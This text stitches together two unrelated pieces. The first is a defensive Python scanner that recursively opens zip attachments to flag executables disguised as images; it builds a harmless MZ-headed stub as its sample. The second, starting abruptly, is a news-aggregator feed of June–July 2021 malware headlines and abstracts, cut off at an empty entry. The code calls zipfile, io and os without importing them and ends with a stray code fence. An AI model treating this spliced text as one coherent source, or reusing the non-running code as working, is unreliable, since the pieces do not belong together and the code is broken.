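from typing import List, Tuple

# File-type signatures checked in order; an identification by content,
# never by the name the sender chose.
MAGIC = [
    (b"PK\x03\x04", "zip"),
    (b"MZ", "pe"),
    (b"\x7fELF", "elf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"%PDF", "pdf"),
]
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}


def sniff(data: bytes) -> str:
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def inspect_archive(blob: bytes, path: str = "attachment", depth: int = 0,
                    max_depth: int = 5, max_bytes: int = 50_000_000) -> List[Tuple[str, str]]:
    """Recursively open zip members and return (member_path, observation)
    pairs for anything a mail gateway should not wave through."""
    findings: List[Tuple[str, str]] = []
    if depth > max_depth:
        return [(path, "nesting deeper than %d levels" % max_depth)]
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return [(path, "claims to be an archive but does not parse")]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member = "%s/%s" % (path, info.filename)
            if info.file_size > max_bytes:
                findings.append((member, "declared size %d exceeds limit" % info.file_size))
                continue   # never decompress what could be a bomb
            data = zf.read(info.filename)
            kind = sniff(data)
            ext = os.path.splitext(info.filename)[1].lower()
            if kind == "zip":
                findings.append((member, "nested archive at depth %d" % (depth + 1)))
                findings.extend(inspect_archive(data, member, depth + 1, max_depth, max_bytes))
            elif kind in ("pe", "elf"):
                if ext in IMAGE_EXTENSIONS:
                    findings.append((member, "%s executable disguised with image extension %s" % (kind, ext)))
                else:
                    findings.append((member, "%s executable inside archive" % kind))
            elif ext in IMAGE_EXTENSIONS and kind not in ("png", "jpeg"):
                findings.append((member, "image extension but unrecognised content (%s)" % kind))
    return findings


def build_sample_attachment() -> bytes:
    """Constructed attachment for the example: outer.zip -> scan.zip ->
    invoice.png, where invoice.png is an MZ-headed stub, not a real PE."""
    fake_pe = b"MZ" + b"\x90" * 62 + b"constructed stub, not an executable"
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice.png", fake_pe)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("scan.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for member, note in inspect_archive(build_sample_attachment()):
        print("%-40s %s" % (member, note))
```

The same walk generalises to other container formats the gateway accepts (gzip, 7z, ISO, OOXML documents, which are themselves zips) by adding a decoder per signature; the point that carries over is that the decision is made on bytes after full recursive extraction, under an explicit depth and size budget, and never on the attachment's outermost name.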
July 16, 2021
TeaBot Mobile Banking Malware Targets Users Across Spain, Germany, Switzerland, and the Netherlands Full Text
Abstract
PRODAFT researchers said that the malware, also known as TeaBot/Anatsa, is part of a rising trend of mobile banking trojan attacking users across Spain, Germany, Switzerland, and the Netherlands.ZDNet
July 16, 2021
New enhanced Joker Malware samples appear in the threat landscape Full Text
Abstract
The Joker malware is back, experts spotted multiple malicious apps on the official Google Play store that were able to evade scanners. Experts reported an uptick in malicious Android apps on the official Google Play store laced with the Joker mobile...Security Affairs
July 16, 2021
IoT-Specific Malware Infections Jumped 700% Amid Pandemic Full Text
Abstract
New telemetry from Zscaler on Internet of Things (IoT) devices demonstrates a dramatic increase in attacks on those devices during the work-from-home phase of the COVID-19 pandemic.Dark Reading
July 15, 2021
Microsoft’s print nightmare continues with malicious driver packages Full Text
Abstract
Microsoft's print nightmare continues with another example of how a threat actor can achieve SYSTEM privileges by abusing malicious printer drivers.BleepingComputer
July 15, 2021
SpearTip Finds New Diavol Ransomware Does Steal Data Full Text
Abstract
Security researchers have linked a new ransomware strain called Diavol to the Wizard Spider threat group behind the Trickbot botnet. BleepingComputer noted the ransomware families utilize the same I/O operations for file encryption queueing and use nearly...Security Affairs
July 15, 2021
macOS: Bashed Apples of Shlayer and Bundlore Full Text
Abstract
The Uptycs threat research team analyzed the macOS malware threat landscape and found that Shlayer and Bundlore are the most prevalent families, together accounting for over 90% of the macOS malware seen in its daily analysis and customer...Security Affairs
July 14, 2021
Trickbot Malware Rebounds with Virtual-Desktop Espionage Module Full Text
Abstract
The attackers have spruced up the ‘vncDll’ module used for spying on targets and stealing data.Threatpost
July 14, 2021
Malware-infected Documents Injected for Over Five Months on the Kazakhstan Government’s Portal Full Text
Abstract
T&T Security and Zerde Holding identified at least two documents uploaded on the government’s legal and budget-related sections that were installing a version of the Razy malware on users’ systems.The Record
July 13, 2021
New BIOPASS malware live streams victim’s computer screen Full Text
Abstract
Hackers compromised gambling sites to deliver a new remote access trojan (RAT) called BIOPASS that enables watching the victim's computer screen in real time by abusing popular live-streaming software.BleepingComputer
July 13, 2021
Trickbot Malware Returns with a new VNC Module to Spy on its Victims Full Text
Abstract
Cybersecurity researchers have opened the lid on the continued resurgence of the insidious TrickBot malware , making it clear that the Russia-based transnational cybercrime group is working behind the scenes to revamp its attack infrastructure in response to recent counter efforts from law enforcement. "The new capabilities discovered are used to monitor and gather intelligence on victims, using a custom communication protocol to hide data transmissions between [command-and-control] servers and victims — making attacks difficult to spot," Bitdefender said in a technical write-up published Monday, suggesting an increase in sophistication of the group's tactics. "Trickbot shows no sign of slowing down," the researchers noted. Botnets are formed when hundreds or thousands of hacked devices are enlisted into a network run by criminal operators, which are often then used to launch denial-of-service attacks to pummel businesses and critical infrastructure withThe Hacker News
July 12, 2021
BIOPASS RAT Uses Live Streaming to Steal Victims' Data Full Text
Abstract
The malware has targeted Chinese gambling sites with fake app installers.Threatpost
July 12, 2021
Magecart Now Targeting Magento Credit Card Swipers Full Text
Abstract
Magecart is one of the most active and prominent threat actor groups targeting e-commerce websites. One of the Magecart groups heavily infected Magento e-commerce websites to steal credit card details using six different types of Magento credit card swipers.Cyware Alerts - Hacker News
July 12, 2021
BIOPASS malware abuses OBS Studio to spy on victims Full Text
Abstract
Researchers from Trend Micro spotted a new malware, dubbed BIOPASS, that captures the victim's screen by abusing the Open Broadcaster Software (OBS) Studio framework...Security Affairs
July 12, 2021
Hackers Spread BIOPASS Malware via Chinese Online Gambling Sites Full Text
Abstract
Cybersecurity researchers are warning about a new malware that's striking online gambling companies in China via a watering hole attack to deploy either Cobalt Strike beacons or a previously undocumented Python-based backdoor called BIOPASS RAT that takes advantage of Open Broadcaster Software (OBS) Studio's live-streaming app to capture the screen of its victims to attackers. The attack involves deceiving gaming website visitors into downloading a malware loader camouflaged as a legitimate installer for popular-but-deprecated apps such as Adobe Flash Player or Microsoft Silverlight, only for the loader to act as a conduit for fetching next-stage payloads. Specifically, the websites' online support chat pages are booby-trapped with malicious JavaScript code, which is used to deliver the malware to the victims. "BIOPASS RAT possesses basic features found in other malware, such as file system assessment, remote desktop access, file exfiltration, and shell command eThe Hacker News
July 12, 2021
BIOPASS RAT New Malware Sniffs Victims via Live Streaming Full Text
Abstract
BIOPASS RAT possesses features such as file system assessment, remote desktop access, file exfiltration, and shell command execution. It can also steal web browser and instant messaging client data.Trend Micro
July 9, 2021
Zloader With a New Infection Technique Full Text
Abstract
The initial attack vector is a phishing email with a Microsoft Word document attachment. Upon opening the document, a password-protected Microsoft Excel file is downloaded from a remote server.McAfee
July 8, 2021
Marvel Movie Malware Detected Full Text
Abstract
Black Widow malware masquerades as new movie to steal money and credentialsInfosecurity Magazine
July 7, 2021
Fake Kaseya VSA Security Update Drops Cobalt Strike Full Text
Abstract
Threat actors are planting Cobalt Strike backdoors by malspamming a bogus Microsoft update along with a SecurityUpdates.exe.Threatpost
July 07, 2021
Fake Kaseya VSA security update backdoors networks with Cobalt Strike Full Text
Abstract
Threat actors are trying to capitalize on the ongoing Kaseya ransomware attack crisis by targeting potential victims in a spam campaign pushing Cobalt Strike payloads disguised as Kaseya VSA security updates.BleepingComputer
July 6, 2021
Malware Dropper: A Threat in Disguise That Cannot be Ignored Full Text
Abstract
Proofpoint researchers dissected a new variant of JSSLoader malware that offered threat actors to evade detections and load additional payloads.Cyware Alerts - Hacker News
July 5, 2021
Mysterious Node.js malware puzzles security researchers Full Text
Abstract
The malware was first spotted in February 2021, being installed as a second-stage payload via GCleaner, a shady software maker that has been seen renting access to users’ devices to malware groups.The Record
July 03, 2021
Android Apps with 5.8 million Installs Caught Stealing Users’ Facebook Passwords Full Text
Abstract
Google intervened to remove nine Android apps downloaded more than 5.8 million times from the company's Play Store after the apps were caught furtively stealing users' Facebook login credentials. "The applications were fully functional, which was supposed to weaken the vigilance of potential victims. With that, to access all of the apps' functions and, allegedly, to disable in-app ads, users were prompted to log into their Facebook accounts," researchers from Dr. Web said . "The advertisements inside some of the apps were indeed present, and this maneuver was intended to further encourage Android device owners to perform the required actions." The offending apps masked their malicious intent by disguising as photo-editing, rubbish cleaner, fitness, and astrology programs, only to trick victims into logging into their Facebook account and hijack the entered credentials via a piece of JavaScript code received from an adversary-controlled server. TheThe Hacker News
July 1, 2021
Linux Variant of REvil Ransomware Targets VMware’s ESXi, NAS Devices Full Text
Abstract
Criminals behind the potent REvil ransomware have ported the malware to Linux for targeted attacks.Threatpost
July 1, 2021
Backdoored Client Discovered from Mongolian CA MonPass Full Text
Abstract
Avast discovered an installer downloaded from the official website of MonPass, a major certification authority (CA) in Mongolia in East Asia that was backdoored with Cobalt Strike binaries.Avast
July 1, 2021
Malware Actors Have Begun Using AutoHotkey Scripts For Attacks Full Text
Abstract
One of the first reported attacks involving AutoHotkey was a credential stealer written in AutoHotkey found in March 2018. It disguised itself as an Antivirus app and spread via infected USB devices.Security Intelligence
June 30, 2021
REvil Linux Variant Now Eying ESXi Virtual Machines Full Text
Abstract
MalwareHunterTeam is alerting about the Linux version of the REvil ransomware that purportedly targets VMware ESXi servers. By targeting virtual machines, REvil can encrypt multiple servers with just a single command. Experts recommend installing VMware (ESXi) in high-security mode and impleme ...Cyware Alerts - Hacker News
June 30, 2021
PJobRAT Disguised as Android Dating App Steals Contacts, SMS, and GPS Data Full Text
Abstract
The cybersecurity experts at Cyble along with 360 Core Security Lab have recently detected the PJobRAT spyware in dating and instant messaging apps stealing contacts, SMSes, and GPS data.GB Hackers
June 29, 2021
Pirated Games Spreading Cryptojacking Malware Full Text
Abstract
Avast stumbled across the Crackonosh malware operation that helped cybercriminals yield at least $2 million in illegal Monero mining by compromising over 222,000 systems worldwide. Therefore, users are recommended to use genuine software to prevent any cyber-incidents.Cyware Alerts - Hacker News
June 28, 2021
Microsoft Signs Malware That Spreads Through Gaming Full Text
Abstract
The driver, called “Netfilter,” is a rootkit that talks to Chinese C2 IPs and aims to spoof gamers’ geo-locations to cheat the system and play from anywhere, Microsoft said.Threatpost
June 28, 2021
Malware Written in GoLang – A Growing Trend Full Text
Abstract
Several threat actors are increasingly writing malicious codes in GoLang. Recently, the PYSA group was found deploying ChaChi, a remote access trojan written in Go.Cyware Alerts - Hacker News
June 26, 2021
Two New IcedID Campaigns Making Rounds in the Wild Full Text
Abstract
A new variant of the IcedID banking trojan has been discovered that spreads via two new spam campaigns. These campaigns are hitting more than 100 detections a day. The best way to stay protected from such threats is to stay alert while receiving emails from unknown senders.Cyware Alerts - Hacker News
June 26, 2021
Microsoft admits to signing rootkit malware in supply-chain fiasco Full Text
Abstract
Microsoft has now confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control IPs.BleepingComputer
June 26, 2021
Crackonosh malware abuses Windows Safe mode to quietly mine for cryptocurrency Full Text
Abstract
Researchers have discovered a strain of cryptocurrency-mining malware that abuses Windows Safe mode during attacks. The malware, dubbed Crackonosh by researchers at Avast, spreads through pirated and cracked software.ZDNet
June 26, 2021
DarkSide Created a Linux Version of Its Ransomware Full Text
Abstract
The DarkSide Russian-speaking cybercrime group, which announced it was closing its ransomware-as-a-service operation, had earlier completed a Linux version of its malware designed to target ESXi servers hosting VMware virtual machines.Info Risk Today
June 25, 2021
JSSLoader: Recoded and Reloaded | Proofpoint US Full Text
Abstract
After a months-long absence, the malware loader JSSLoader returned in June 2021 cyberattack campaigns by TA543 threat actor, rewritten from the .NET programming language to C++.Proofpoint
June 25, 2021
Crackonosh virus mined $2 million of Monero from 222,000 hacked computers Full Text
Abstract
A previously undocumented Windows malware has infected over 222,000 systems worldwide since at least June 2018, yielding its developer no less than 9,000 Moneros ($2 million) in illegal profits. Dubbed " Crackonosh ," the malware is distributed via illegal, cracked copies of popular software, only to disable antivirus programs installed in the machine and install a coin miner package called XMRig for stealthily exploiting the infected host's resources to mine Monero. At least 30 different versions of the malware executable have been discovered between Jan. 1, 2018, and Nov. 23, 2020, Czech cybersecurity software company Avast said on Thursday, with a majority of the victims located in the U.S., Brazil, India, Poland, and the Philippines. Crackonosh works by replacing critical Windows system files such as serviceinstaller.msi and maintenance.vbs to cover its tracks and abuses the safe mode , which prevents antivirus software from working, to delete Windows DefenderThe Hacker News
June 24, 2021
Spam Downpour Drips New IcedID Banking Trojan Variant Full Text
Abstract
The primarily IcedID-flavored banking trojan spam campaigns were coming in at a fever pitch: Spikes hit more than 100 detections a day.Threatpost
June 24, 2021
Malicious spam campaigns delivering banking Trojans Full Text
Abstract
In mid-March 2021, Kaspersky researchers observed two new spam campaigns. The messages in both cases were written in English and contained ZIP attachments or links to ZIP files.Kaspersky Labs
June 24, 2021
New GoLang-based ChaChi Trojan Used as Part of Ransomware Campaigns Against US Schools Full Text
Abstract
The research team from BlackBerry Threat Research and Intelligence said on Wednesday that the malware, dubbed ChaChi, is also being used as a key component in launching ransomware attacks.ZDNet
June 24, 2021
ChaChi, a GoLang Trojan used in ransomware attacks on US schools Full Text
Abstract
A new Trojan written in the Go programming language, tracked as ChaChi, was involved in ransomware attacks against government agencies and US schools. Researchers from BlackBerry Threat Research and Intelligence spotted a new RAT written in the Go programming...Security Affairs
June 24, 2021
Ursnif Leverages Cerberus Android Malware to Automate Fraudulent Bank Transfers in Italy Full Text
Abstract
Once infected by Ursnif and upon attempting to access their banking account, victims are advised that they won’t be able to continue to use their bank’s services without downloading a security app.Security Intelligence
June 23, 2021
sLoad Malware Moving to European Targets Full Text
Abstract
Starslord loader has been reported active again with its target in the U.K and Italy. The malware creator is regularly changing the first stage script, while the main module largely remains the same. sLoad is a potential threat; it is important that organizations take this threat more seriously and ...Cyware Alerts - Hacker News
June 23, 2021
PYSA ransomware backdoors education orgs using ChaChi malware Full Text
Abstract
The PYSA ransomware gang has been using a remote access Trojan (RAT) dubbed ChaChi to backdoor the systems of healthcare and education organizations and steal data that later gets leveraged in double extortion ransom schemes.BleepingComputer
June 22, 2021
Vigilante Malware Prevent Access to Piracy Sites Full Text
Abstract
Experts uncovered an attack campaign that targets users of pirated software. The Vigilante malware blocks users' access to websites hosting pirated software. Users are requested to stay protected by avoiding the download of pirated software or clicking on links from unknown users.Cyware Alerts - Hacker News
June 22, 2021
NukeSped Copies Fileless Code From Bundlore, Leaves It Unused Full Text
Abstract
While investigating samples of NukeSped, a remote access trojan (RAT), Trend Micro came across several Bundlore adware samples using the same fileless routine that was spotted in NukeSped.Trend Micro
June 22, 2021
DroidMorph tool generates Android Malware Clones that Full Text
Abstract
Boffins developed a tool dubbed DroidMorph that provides morphing of Android applications (APKs) and allows the creation of Android app (malware/benign) clones. A group of researchers from Adana Science and Technology University (Turkey) and the National...Security Affairs
June 21, 2021
Sload Targeting Europe Again Full Text
Abstract
Sload (aka Starslord loader) is one of the most dangerous types of malware in recent years. It usually functions as a downloader with an aim to assess the target and drop a more significant payload.Minerva Labs
June 19, 2021
Matanbuchus Loader: A New Malware-as-a-Service Full Text
Abstract
Researchers identified a threat actor targeting multiple organizations including large universities and high schools in the U.S., along with high-tech organizations in Belgium.Cyware Alerts - Hacker News
June 19, 2021
Vigilante malware stops victims from visiting piracy websites Full Text
Abstract
Sophos researchers uncovered a malware campaign that aims at blocking infected users from visiting a large number of websites dedicated to software piracy by modifying the HOSTS file on the infected system.Security Affairs
June 18, 2021
Vigilante malware stops victims from visiting piracy websites Full Text
Abstract
This strange malware stops you from visiting pirate websites Sophos researchers uncovered a malware campaign that aims at blocking infected users from being able to visit a large number of piracy websites. Sophos researchers uncovered a malware...Security Affairs
June 18, 2021
Newly Discovered Vigilante Malware Rats Out Software Pirates and Blocks Them Full Text
Abstract
Vigilante, as SophosLabs Principal Researcher Andrew Brandt is calling the malware, gets installed when victims download and execute what they think is pirated software or games.Ars Technica
June 17, 2021
Matanbuchus: Malware-as-a-Service with Demonic Intentions Full Text
Abstract
Unit42 researchers found several organizations impacted by Matanbuchus including a large university and high school in the United States, as well as a high-tech organization in Belgium.Palo Alto Networks
June 17, 2021
Vigilante malware blocks victims from downloading pirated software Full Text
Abstract
A vigilante developer turns the tables on software pirates by distributing malware that prevents them from accessing pirated software sites in the future.BleepingComputer
June 17, 2021
Puzzling New Malware Blocks Access to Piracy Sites Full Text
Abstract
Newly discovered threat could be the work of an anti-piracy vigilanteInfosecurity Magazine
June 17, 2021
Researchers Uncover ‘Process Ghosting’ — A New Malware Evasion Technique Full Text
Abstract
Cybersecurity researchers have disclosed a new executable image tampering attack dubbed "Process Ghosting" that could be potentially abused by an attacker to circumvent protections and stealthily run malicious code on a Windows system. "With this technique, an attacker can write a piece of malware to disk in such a way that it's difficult to scan or delete it — and where it then executes the deleted malware as though it were a regular file on disk," Elastic Security researcher Gabriel Landau said . "This technique does not involve code injection, Process Hollowing, or Transactional NTFS (TxF)." Process Ghosting expands on previously documented endpoint bypass methods such as Process Doppelgänging and Process Herpaderping , thereby enabling the veiled execution of malicious code that may evade anti-malware defenses and detection. Process Doppelgänging, analogous to Process Hollowing , involves injecting arbitrary code in the address space ofThe Hacker News
June 16, 2021
DirtyMoe: Introduction and General Overview of Modularized Malware Full Text
Abstract
The aim of this malware is focused on Cryptojacking and DDoS attacks. DirtyMoe is run as a Windows service under system-level privileges via EternalBlue and at least three other exploits.Avast
June 16, 2021
Cyberium malware-hosting domain employed in multiple Mirai variants campaigns Full Text
Abstract
A new variant of the Mirai botnet, tracked as Moobot, was spotted scanning the Internet for vulnerable Tenda routers. Researchers from AT&T Alien Lab have spotted a new variant of the Mirai botnet, tracked as Moobot, which was scanning the Internet...Security Affairs
June 15, 2021
TeaBot Trojan Spreads via Fake Antivirus Apps Full Text
Abstract
Malware actors are increasingly luring victims under the pretense of popular apps and brands. A malware infection impersonating Kaspersky’s antivirus product for Android launched attacks against its users via third-party app marketplaces.Cyware Alerts - Hacker News
June 15, 2021
Moobot Targeting Tenda Router Bugs for Distribution Full Text
Abstract
Underground malware domain Cyberium was spotted hosting an active Mirai variant to exploit an RCE in Tenda routers. Experts found several campaigns going back to as early as May 2020. It has been in action for the past year and appears to be still active.Cyware Alerts - Hacker News
June 15, 2021
Malicious PDFs Flood the Web, Lead to Password-Snarfing Full Text
Abstract
SolarMarker makers are using SEO poisoning, stuffing thousands of PDFs with tens of thousands of pages full of SEO keywords & links to redirect to the malware.Threatpost
June 14, 2021
SEO poisoning campaign aims at delivering RAT, Microsoft warns Full Text
Abstract
Microsoft spotted a series of attacks that use SEO poisoning to deliver a remote access trojan (RAT) used by threat actors to steal sensitive data. Microsoft is monitoring a wave of cyber attacks that leverages SEO poisoning to deliver a remote access...Security Affairs
June 14, 2021
Microsoft: SEO poisoning used to backdoor targets with malware Full Text
Abstract
Microsoft is tracking a series of attacks that use SEO poisoning to infect targets with a remote access trojan (RAT) capable of stealing the victims' sensitive info and backdooring their systems.BleepingComputer
June 14, 2021
Malware hosting domain Cyberium fanning out Mirai variants Full Text
Abstract
AT&T Alien Labs observed Moobot, a Mirai variant botnet, scanning for known but uncommon vulnerabilities in Tenda routers and also discovered a malware-hosting domain distributing few Mirai variants.AT&T Cybersecurity
June 10, 2021
Steam Gaming Platform Hosting Malware Full Text
Abstract
Emerging malware is lurking in Steam profile images.Threatpost
June 10, 2021
Victory Backdoor Targeting Southeast Asian Governments Full Text
Abstract
A surveillance operation by SharpPanda APT is active right now and targeting the Southeast Asian government. According to researchers, malware has been under development for the past three years. Additionally, attackers behind this campaign are using anti-analysis and anti-debugging techniques to i ...Cyware Alerts - Hacker News
June 10, 2021
SteamHide Malware Hides Inside Steam Profile Images Full Text
Abstract
Researchers found a new malware that relies on the Steam gaming platform for distributing its payload. It uses Steam profile images to evade detection.Cyware Alerts - Hacker News
June 9, 2021
Siloscape is Backdooring Clusters via Windows Containers Full Text
Abstract
For the first time, a new malware strain has been found targeting Windows containers to disrupt Kubernetes cloud environments. Named Siloscape, it opens a backdoor for all kinds of malicious activity without limiting itself to any particular infection goal. Kubernetes admins are recommended to ...Cyware Alerts - Hacker News
June 8, 2021
SteamHide: Hiding Malware in Plain Sight Full Text
Abstract
SteamHide abuses the gaming platform Steam to serve payloads for malware downloaders. Malware operators can also update already infected machines by adding new profile images to Steam.G-Data Security Blog
June 8, 2021
FreakOut Reloaded with New Exploits to Target its Victims Full Text
Abstract
FreakOut, the multi-platform Python-based malware that targets Windows and Linux devices, has been updated. The malware is now upgraded to worm its way into publicly exposed unpatched VMware servers.Cyware Alerts - Hacker News
June 8, 2021
SystemBC Malware Hides Behind Socks5 Proxy Full Text
Abstract
The injector used by the malware is also obfuscated with a compiler-based technique named control flow flattening, which modifies the normal flow of the program and makes static analysis impossible.Minerva Labs
June 8, 2021
Gootkit: the cautious Trojan Full Text
Abstract
Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. Using spam campaigns, attackers later switched to compromised sites which trick victims into downloading the malware.Kaspersky Labs
June 7, 2021
Siloscape, first known malware that drops a backdoor into Kubernetes clusters Full Text
Abstract
Siloscape is a new strain of malware that targets Windows Server containers to execute code on the underlying node and spread in the Kubernetes cluster. Researchers from Palo Alto Networks have spotted a piece of malware that targets Windows Server...Security Affairs
June 7, 2021
Windows Container Malware Targets Kubernetes Clusters Full Text
Abstract
“Siloscape”, the first malware to target Windows containers, breaks out of Kubernetes clusters to plant backdoors and raid nodes for credentials.Threatpost
June 7, 2021
New Siloscape malware targets Windows containers and highlights security pitfalls Full Text
Abstract
Researchers at Palo Alto Unit 42 have discovered what they think is the first malware strain known to target Windows cloud containers. In new research unveiled June 7, senior security researcher Daniel Prizmant wrote that the malware, called Siloscape, attacks misconfigured Kubernetes clusters and allows for the creation of malicious containers that a threat actor…SCMagazine
June 07, 2021
New Kubernetes malware backdoors clusters via Windows containers Full Text
Abstract
New malware active for more than a year is compromising Windows containers to compromise Kubernetes clusters with the end goal of backdooring them and paving the way for attackers to abuse them in other malicious activities.BleepingComputer
June 07, 2021
Researchers Discover First Known Malware Targeting Windows Containers Full Text
Abstract
Security researchers have discovered the first known malware, dubbed " Siloscape ," targeting Windows Server containers to infect Kubernetes clusters in cloud environments. "Siloscape is heavily obfuscated malware targeting Kubernetes clusters through Windows containers," said Unit 42 researcher Daniel Prizmant. "Its main purpose is to open a backdoor into poorly configured Kubernetes clusters in order to run malicious containers such as, but not limited to, cryptojackers." Siloscape, first detected in March 2021, is characterized by several techniques, including targeting common cloud applications such as web servers to gain an initial foothold via known vulnerabilities, following which it leverages Windows container escape techniques to break out of the confines of the container and gain remote code execution on the underlying node. A container is an isolated, lightweight silo for running an application on the host operating system. The malware...The Hacker News
June 7, 2021
US Justice Department accuses Latvian national of deploying Trickbot malware Full Text
Abstract
The DoJ charged a Latvian woman for her alleged role in creating and deploying Trickbot, the computer banking trojan that has evolved to become a highly popular form of malware among cybercriminals.ZDNet
June 5, 2021
New Techniques Allow Malware to Bypass Antivirus Defenses Full Text
Abstract
Academics from two European universities devised Cut-and-Mouse and Ghost Control attack techniques that affect the protected folder feature offered by antivirus programs. Malware authors are continuously attempting to sneak past security defenses and the discovery of attack scenarios like these can ...Cyware Alerts - Hacker News
June 04, 2021
FreakOut malware worms its way into vulnerable VMware servers Full Text
Abstract
A multi-platform Python-based malware targeting Windows and Linux devices has now been upgraded to worm its way into Internet-exposed VMware vCenter servers unpatched against a remote code execution vulnerability.BleepingComputer
June 3, 2021
Google PPC Ads Used to Deliver Infostealers Full Text
Abstract
The crooks pay top dollar for Google search results for the popular AnyDesk, Dropbox & Telegram apps that lead to a malicious, infostealer-packed website.Threatpost
June 03, 2021
Google Chrome now warns you of extensions from untrusted devs Full Text
Abstract
Google has added new protection capabilities for Enhanced Safe Browsing users in Chrome, warning them when installing untrusted extensions and allowing them to request more in-depth scans of downloaded files.BleepingComputer
June 03, 2021
Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities Full Text
Abstract
New upgrades have been made to a Python-based "self-replicating, polymorphic bot" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection. "Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code," researchers from Cisco Talos said in a deep-dive published today. Said to be in development as far back as 2015, Necro (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed " FreakOut " that was found exploiting vulnerabilities in network-attached storage (The Hacker News
June 3, 2021
Necro Python bot adds new exploits and Tezos mining to its bag of tricks Full Text
Abstract
Although the bot was first discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different C2 communications and the addition of new exploits for spreading.Cisco Talos
June 3, 2021
Mustang Panda Cyber Espionage Group Plants Malware Backdoor on Myanmar President’s Website Full Text
Abstract
A cyber-espionage hacking group is believed to have hacked the website of the Myanmar president’s office and planted a backdoor trojan inside a localized Myanmar font package.The Record
June 2, 2021
Threat Actors Use Mockups of Popular Apps to Spread Teabot and Flubot Malware on Android Full Text
Abstract
Bitdefender researchers have discovered a batch of new malicious Android applications that impersonate real ones from popular brands but with a twist to spread TeaBot and FluBot malware.Bitdefender
June 2, 2021
Poisoned Installers Discovered During Analysis of SolarWinds Hackers Toolkit Full Text
Abstract
The ongoing multi-vendor investigations into the SolarWinds mega-hack took another twist this week with the discovery of new malware artifacts that could be used in future supply chain attacks.Security Week
June 01, 2021
Malware Can Use This Trick to Bypass Ransomware Defense in Antivirus Solutions Full Text
Abstract
Researchers have disclosed significant security weaknesses in popular software applications that could be abused to deactivate their protections and take control of allow-listed applications to perform nefarious operations on behalf of the malware to defeat anti-ransomware defenses. The twin attacks, detailed by academics from the University of Luxembourg and the University of London, are aimed at circumventing the protected folder feature offered by antivirus programs to encrypt files (aka "Cut-and-Mouse") and disabling their real-time protection by simulating mouse "click" events (aka "Ghost Control"). "Antivirus software providers always offer high levels of security, and they are an essential element in the everyday struggle against criminals," said Prof. Gabriele Lenzini, chief scientist at the Interdisciplinary Center for Security, Reliability, and Trust at the University of Luxembourg. "But they are competing with criminals whiThe Hacker News
June 1, 2021
Russian hacker Pavel Sitnikov arrested for distributing malware via Telegram Full Text
Abstract
The popular Russian hacker Pavel Sitnikov was arrested by Russian authorities on charges of distributing malware via his Telegram channel. Pavel Sitnikov (@Flatl1ne), a prominent figure of the hacking underground, was arrested earlier this month by Russian...Security Affairs
June 1, 2021
Revisiting the NSIS-based crypter Full Text
Abstract
It is a free and powerful tool, making the distribution of software easier. Unfortunately, its qualities are known not only to legitimate developers but also to malware distributors.Malwarebytes Labs
May 31, 2021
Using Fake Reviews to Find Dangerous Extensions – Krebs on Security Full Text
Abstract
Leaving aside the extensions which are outright fraudulent, so many legitimate extensions get abandoned or sold each year to shady marketers that it’s wise to only trust actively maintained extensions.Krebs on Security
May 31, 2021
Fake Streaming Service Spreads BazarLoader Full Text
Abstract
Scammers have noted how subscriptions to online streaming services during the COVID-19 pandemic have skyrocketed. Proofpoint researchers expose a malspam campaign using a fake movie streaming service called BravoMovies.Cyware Alerts - Hacker News
May 31, 2021
Agrius Masquerades as Ransomware in Attacks Against Israel Full Text
Abstract
Experts stumbled across a new threat actor that utilizes data-wiping malware to disrupt its victims’ IT infrastructure and demand a ransom posing as ransomware actors. In addition, it is focusing its attacks on a variety of organizations based in the Middle East.Cyware Alerts - Hacker News
May 30, 2021
Facefish Backdoor delivers rootkits to Linux x64 systems Full Text
Abstract
Qihoo 360 NETLAB spotted a new backdoor dubbed Facefish that could allow attackers to take over Linux systems and steal sensitive data. Cybersecurity experts from Qihoo 360 NETLAB published details about a new backdoor, dubbed Facefish, which can be used...Security Affairs
May 29, 2021
Secure Search is a Browser Hijacker – How to Remove it Now? Full Text
Abstract
Secured Search is a browser hijacker that changes your browser's settings to promote securedsearch.com, let's remove it. Secured Search is the same piece of software as ByteFence Secure Browsing. It's supposedly a tool that improves browsing security...Security Affairs
May 28, 2021
Chinese cyberspies are targeting US, EU orgs with new malware Full Text
Abstract
Chinese threat groups continue to deploy new malware strains on the compromised network of dozens of US and EU organizations after exploiting vulnerable Pulse Secure VPN appliances.BleepingComputer
May 28, 2021
Researchers Warn of Facefish Backdoor Spreading Linux Rootkits Full Text
Abstract
Cybersecurity researchers have disclosed a new backdoor program capable of stealing user login credentials, device information and executing arbitrary commands on Linux systems. The malware dropper has been dubbed " Facefish " by Qihoo 360 NETLAB team owing its capabilities to deliver different rootkits at different times and the use of Blowfish cipher to encrypt communications to the attacker-controlled server. "Facefish consists of 2 parts, Dropper and Rootkit, and its main function is determined by the Rootkit module, which works at the Ring 3 layer and is loaded using the LD_PRELOAD feature to steal user login credentials by hooking ssh/sshd program related functions, and it also supports some backdoor functions," the researchers said . The NETLAB research builds on a previous analysis published by Juniper Networks on April 26, which documented an attack chain targeting Control Web Panel (CWP, formerly CentOS Web Panel) to inject an SSH implant witThe Hacker News
May 27, 2021
Malvertising Campaign On Google Distributed Trojanized AnyDesk Installer Full Text
Abstract
